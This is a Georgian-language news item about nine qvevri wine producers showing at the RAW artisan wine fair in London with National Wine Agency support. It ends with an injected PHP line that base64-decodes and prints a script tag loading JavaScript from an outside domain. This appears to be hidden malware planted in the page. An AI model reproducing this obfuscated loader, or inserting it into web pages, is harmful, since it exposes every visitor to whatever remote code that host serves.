celsiusi
ავერსი შნაიდერი
14-15 მაისს, დიდ ბრიტანეთში, ქალაქ ლონდონში  ბუნებრივი ღვინოების საერთაშორისო გამოფენა „RAW” (The Artisan Wine Fair) მიმდინარეობს, რომელშიც, ღვინის ეროვნული სააგენტოს მხარდაჭერით, საქართველოდან ქვევრის ღვინის მწარმოებელი 9 კომპანია მონაწილეობს. ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIMS ღვინის ეროვნული სააგენტოდან აცნობეს.
 
მატივე ცნობით, გამოფენის ორგანიზატორი ცნობილი ღვინის ექსპერტი იზაბელ ლეჟერონია (საფრანგეთი).
 
"ღვინის ეროვნული სააგენტოს საქმიანობის ერთ-ერთი მთავარი მიზანია, ხელი შეუწყოს ქართული ღვინის პოპულარიზაციას და ბაზრების დივერსიფიკაციას. საქართველო ,,RAW WINE”-ში (The Artisan Wine Fair) 2012 წლიდან მონაწილეობს. აღნიშნულ გამოფენაზე ქართული ღვინის წარდგენა ღვინის მწარმოებლებს შესაძლებლობას აძლევს, ღვინის პროფესიონალთა ფართო აუდიტორიას  და პოტენციურ იმპორტიორებს საკუთარი პროდუქცია გააცნონ."– აღნიშნავენ ღვინის ეროვნულ სააგენტოში.  
 
 
წელს, ლონდონში გამართულ გამოფენაში მონაწილეობენ ქვევრის ღვინის მწარმოებელი კომპანიები: „მეღვინეობა ართანა“, „ანდრიას ღვინო“, „ანაპეა“, „დორემი“, „დემის მარანი“, „გოცას ღვინო“, „ნიკალას მარანი“, „ბაიას ღვინო“,  „ახმეტის ღვინის სახლი“.
 
 
 
713
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");